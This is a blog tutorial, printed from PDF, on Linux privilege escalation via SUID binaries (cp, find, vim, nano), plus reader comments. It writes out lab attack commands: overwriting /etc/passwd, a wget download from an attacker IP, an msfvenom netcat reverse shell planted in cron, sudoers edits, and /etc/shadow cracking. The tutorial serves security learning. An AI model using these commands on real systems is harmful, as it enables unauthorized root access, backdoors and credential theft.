Hacking Articles

Raj Chandel’s Blog

Privilege Escalation

Linux Privilege Escalation using SUID Binaries

May 16, 2018 By Raj

In our previous article we have discussed “Privilege Escalation in Linux using etc/passwd file”
and today we will learn “Privilege Escalation in Linux using SUID Permission.” While solving
CTF challenges we always check suid permissions for any file or command for privilege
escalation. It is very important to know what SUID is, how to set SUID and how SUID helps in
privilege escalation. You can read our previous article where we had applied this trick for
privilege escalation. Open the links given below:

Link 1: Hack the Box Challenge: Bank Walkthrough

Link 2: Hack the Box Challenge: Haircut Walkthrough

Let’s Start with Theoretical Concept !!

As we all know in Linux everything is a file, including directories and devices which have
permissions to allow or restrict three operations i.e. read/write/execute. So when you set
permission for any file, you should be aware of the Linux users to whom you allow or restrict all
three permissions. Take a look at the following image.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Hence it is clear that the maximum number of bit is used to set permission for each user is 7,
which is a combination of read (4) write (2) and execute (1) operation. For example, if you set
chmod 755, then it will look like as rwxr-xr-x.

But when special permission is given to each user it becomes SUID, SGID, and sticky bits.
When extra bit “4” is set to user(Owner) it becomes SUID (Set user ID) and when bit “2” is set
to group it becomes SGID (Set Group ID) and if other users are allowed to create or delete any
file inside a directory then sticky bits “1” is set to that directory.

What is SUID Permission?

SUID: Set User ID is a type of permission that allows users to execute a file with the
permissions of a specified user. Those files which have suid permissions run with higher
privileges. Assume we are accessing the target system as a non-root user and we found suid
bit enabled binaries, then those file/program/command can run with root privileges.

How to set suid?

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Basically, you can change the permission of any file either using the “Numerical” method or
“Symbolic” method. As result, it will replace x from s as shown in the below image which
denotes especial execution permission with the higher privilege to a particular file/command.
Since we are enabling SUID for Owner (user) therefore bit 4 or symbol s will be added before
read/write/execution operation.

If you execute ls -al with the file name and then you observe the small ‘s’ symbol as in the
above image, then its means SUID bit is enabled for that file and can be executed with root
privileges.

How to Find SUID Files

By using the following command you can enumerate all binaries having SUID permissions:

find / -perm -u=s -type f 2>/dev/null

/denotes start from the top (root) of the file system and find every directory
-perm denotes search for the permissions that follow
-u=sdenotes look for files that are owned by the root user
-typestates the type of file we are looking for
f denotes a regular file, not the directories or special files
2 denotes to the second file descriptor of the process, i.e. stderr (standard error)
> means redirection
/dev/null is a special filesystem object that throws away everything written into it.

HOW SUID helps in privilege escalation?

In Linux, some of the existing binaries and commands can be used by non- root users to
escalate root access privileges if the SUID bit is enabled. There are some famous Linux / Unix
executable commands that can allow privilege escalation: Bash, Cat, cp, echo, find, Less, More,
Nano, Nmap, Vim and etc

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Visit here more: //gtfobins.github.io/#+sudo

Let’s get deep through practical work. First, create a user that should not be a sudo group user.
Here, we have added user “ignite” whose UID is 1001 and GID is 1001 and therefore ignite is a
non- root user.

adduser ignite

Privilege Escalation using the copy command

If suid bit is enabled for the cp command, which is used to copy the data, it can lead to an
escalation privilege to gain root access.

For example, suppose you (system admin) want to give cp command SUID permission. Then
you can follow the steps below to identify its location and current permission, after which you
can enable SUID bit by changing permission.

which cp
ls -al /bin/cp
chmod u+s /bin/cp

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
 st
1 Method

On the other hand, start your attacking machine and first compromise the target system and
then move to the privilege escalation phase. Suppose I successfully log into the victim’s
machine via ssh and access the non-root user terminal. Then by using the following command,
you can list all binaries with SUID permission.

find / -perm -u=s -type f 2>/dev/null

In the above image, you can observe that it is showing so many files but we are interested in
/bin/cp file. Because now we can copy /etc/passwd file for reading user list. Therefore I copy
/passwd file inside the HTML directory.

cp /etc/passwd /var/www/html

On other hands, we have generated a new encrypted password: pass123 using OpenSSL
passwd

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
We have copied the /passwd file into the web directory, i.e. /var/www/html, so I can open it
through the web browser and then copy the entire contents of the /passwd file into a text file
and then add our own user with root UID, GID, and directory.

In our previous article, we have already discussed how to add a user /etc/passwd using
the OpenSSL passwd utility.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Run Python HTTP server for transferring our edited passwd file into target’s machine.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
 python -m SimpleHTTPServer 80

As we all know, the /tmp directory has all permission to create or delete any file, so we have
downloaded our passwd file inside it. After it is downloaded, we have copied the /tmp/passwd
data to /etc/passwd as a result, it will overwrite the original passwd file.

cd /tmp
wget //192.168.1.108/passwd
cp passwd /etc/passwd

With the help of tail command, we ensured that our user “hack” is either the part of
/etc/passwd file. Since we have added our own user with root privileges let’s get into the root
directory.

su hack
whoami

And Yessssssss !! This is an incredible way to escalated root privilege.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
 nd
2 Method

Similarly, if SUID bit is enabled for the cp command, we can also transfer our backdoor to the
target system. Here, we have generated netcat backdoor for reverse connection using the
msfvenom command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

Then copy the above highlighted code and paste it into a text file by editing #! /bin/bash, then
ready to transfer it to the target system, I saved it as raj.sh.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Now we are all aware of the Linux crontab utility that runs files hourly, daily, weekly and
monthly, so I copied raj.sh to /etc/cron.hourly, so it will run raj.sh after one hour.

cp raj.sh /etc/cron.hourly/
ls -al /etc/cron.hourly/

Other hands we started Netcat listener in a new terminal and as the hour past it gives reverse
connection of the target’s system with root privileges.

Hence we saw how a single cp command can lead to privilege escalation if SUID bit is ON. You
can try your own way to escalated root privilege using cp command.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Privilege Escalation Using Find Command

Similarly, we can escalate root privilege if SUID bit is ON for /usr/bin/find.

For example, suppose you (system admin) want to give SUID permission for Find command.
Then you can use which command to identify its location and current permission after then you
can enable SUID bit by changing permission.

which find
ls -al /usr/bin/find
chmod u+s /usr/bin/find

Again compromise the target system and then move for privilege escalation phase as done
above. Then by using the following command, you can enumerate all binaries having SUID
permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled to find command which means we can
execute any command within find command. To do so first we create an empty file “raj” and
then run the whoami command as shown below.

touch raj
find raj -exec "whoami" \;

If an attacker successfully enumerated SUID bit for /usr/bin/find then it will allow him to execute
any malicious command such netcat bin/bash shell or may fetch important system information
for privilege escalation.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Privilege Escalation Using Vim editor

Similarly, we can escalate root privilege if SUID bit is ON for Vim editor. For example, suppose
you (system admin) want to give SUID permission for Vim editor. Then you can use “which”
command to identify its location and current permission after then you can enable SUID bit by
changing permission.

which vim
ls -al /usr/bin/vim
ls -al /etc/alternatives/vim
chmod u+s /usr/bin/vim.basic

You will found vim.basic through symlinking as shown in the below image.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Again compromise the target system and then move for privilege escalation phase as done
above. Then by using the following command, you can enumerate all binaries who’s having
SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /usr/bin/vim.basic and hence now we can
edit any file which through vim that can be editable only by sudo or root user.

As we know ignite is non-root user who has least permissions, since vim has SUID permission,
therefore, we can edit the sudoers file through it and can change permissions for user “ignite”.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
So we open sudoers file by typing visudo command and give all permission to user “ignite” as
shown in the image.

ignite ALL=(ALL:ALL) ALL

Now let access root directory as shown in below image.

sudo -l
sudo bash
id

Great!! This trick also works superbly for privilege escalation.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Privilege Escalation using Saved Script

There are maximum chances to get any kind of script for the system or program call, it can be
any script either PHP, Python or C language script. Suppose you (system admin) want to give
SUID permission to a C language script which will provide bash shell on execution.

So here we have coded a c program which will call system for bash shell and saved it as
“asroot.c”.

Then create a rootshell directory inside /bin directory and copy the asroot.c file in rootshell
directory then run gcc compiler for compilation.

mkdir /bin/rootshell
cd /bin/rootshell
cp /home/raj/Desktop/asroot.c .
ls
gcc asroot.c -o shell
chmod u+s shell
ls -al shell

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Now again compromise the target’s system and use find command to identify binaries having
SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for so many binary files but we are
interested in /bin/rootshell/shell. So we move into /bin/rootshell directory and run the
“shell” script, as result, we get root access as shown below.

cd /bin/rootshell/shell
./shell
id

Hence we saw how we can escalate root privilege if SUID bit is enabled for any script,
although it is not possible to get such a script that calls bash shell if you found any script with
SUID permission then using above techniques you can modify the contents of that script to get
the bash shell.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Privilege Escalation using Nano Editor

Similarly, we can escalate root privilege if SUID bit is ON for nano editor. For example, suppose
you (system admin) want to give SUID permission for nano editor. Then you may follow the
below steps to identify its location and current permission so that you can enable SUID bit by
changing permission.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
 which nano
ls -al /bin/nano
chmod u+s /bin/nano

Again compromise the target system and then move for privilege escalation phase as done
above. Then by using the following command, you can enumerate all binaries having SUID
permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /bin/nano and now let’s open /etc/passwd
file to edit own user as done above by using OpenSSL passwd.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
On other hands, I have generated a new encrypted password: 123 using OpenSSL passwd

Now open passwd file with nano editor and add your own user as done above. Here you can
observe I have created demo user with an encrypted password in the victim’s system.

nano /etc/passwd

Since we have added our own user with root privileges let’s get into the root directory.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
 su demo
id

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
 nd
2 Method

If suid bit is enabled for /bin/nano then we can steal the password from inside /etc/shadow file.
So after compromising target’s machine we had opened shadow file in nano editor and copy
the encrypted password set for user: raj.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Now paste above copy code into a text file and saved as a hash on the desktop, after then
used John the ripper to decode it as shown below. It has given raj: 123 as password, now try to
login into target’s system through raj account.

So Today we have demonstrated how the SUID permission can lead to privilege escalation
even if it is allowed to a normal copy, cat, nano, vim and so commands and programs.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information
Security Consultant Social Media Lover and Gadgets. Contact here

11 thoughts on “Linux Privilege Escalation using SUID

Binaries”

Afonso Alves
May 19, 2018 at 7:13 pm

Thanks for all your work!

This is a well-done research!

Reply

Mani
March 14, 2019 at 5:03 am

Thank you for this article.

you described all possible scenarios for Privilege Escalation but I would like to know,
how a user can do Privilege Escalation using bash file which its content is
“/bin/bash” ?
Thank you

Reply

n0p3ntm3
December 14, 2020 at 7:10 am

If “/bin/bash” has SUID set, user can execute “bash -p” and this should allow you
to run the bash as root. Please correct me if I am wrong.

Cheers!

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
 Reply

BlaCkDicE
April 22, 2021 at 11:14 pm

Thanks Bro.

Your tip about -p help me to give a root on a system!

Reply

hasan ates
June 13, 2019 at 5:06 pm

if you allow me i would like to translate this post to turkish language and post my
blog website. is this ok ???

Reply

Raj Chandel 
June 14, 2019 at 4:29 pm

k no problem

Reply

Prateek sehitia
August 10, 2019 at 6:59 am

I find one problem; even when you can copy passwd file but when you try to move it
to /etc/passwd error will occur, coz most of the times it is in rwxr–r–
Please suggest some other alternative

Reply

rafael
October 12, 2019 at 2:14 am

Same problem.,.. please.. can you explain that part??

thank you!!!

Reply

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
 Sandeep Yadav
February 24, 2021 at 10:09 am

sir pz aap na Privilege Escalation cheat sheet ka ek book bna dijiye plz sr .

Reply

klokla
May 11, 2021 at 4:19 am

when i set suid /usr/bin/python2.7

but not privilege escalation with python2.7 ???
python -c ‘import os; os.system(“/bin/sh”)’

Reply

Jeremiah
July 20, 2021 at 5:24 pm

woow! good notes

Reply

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF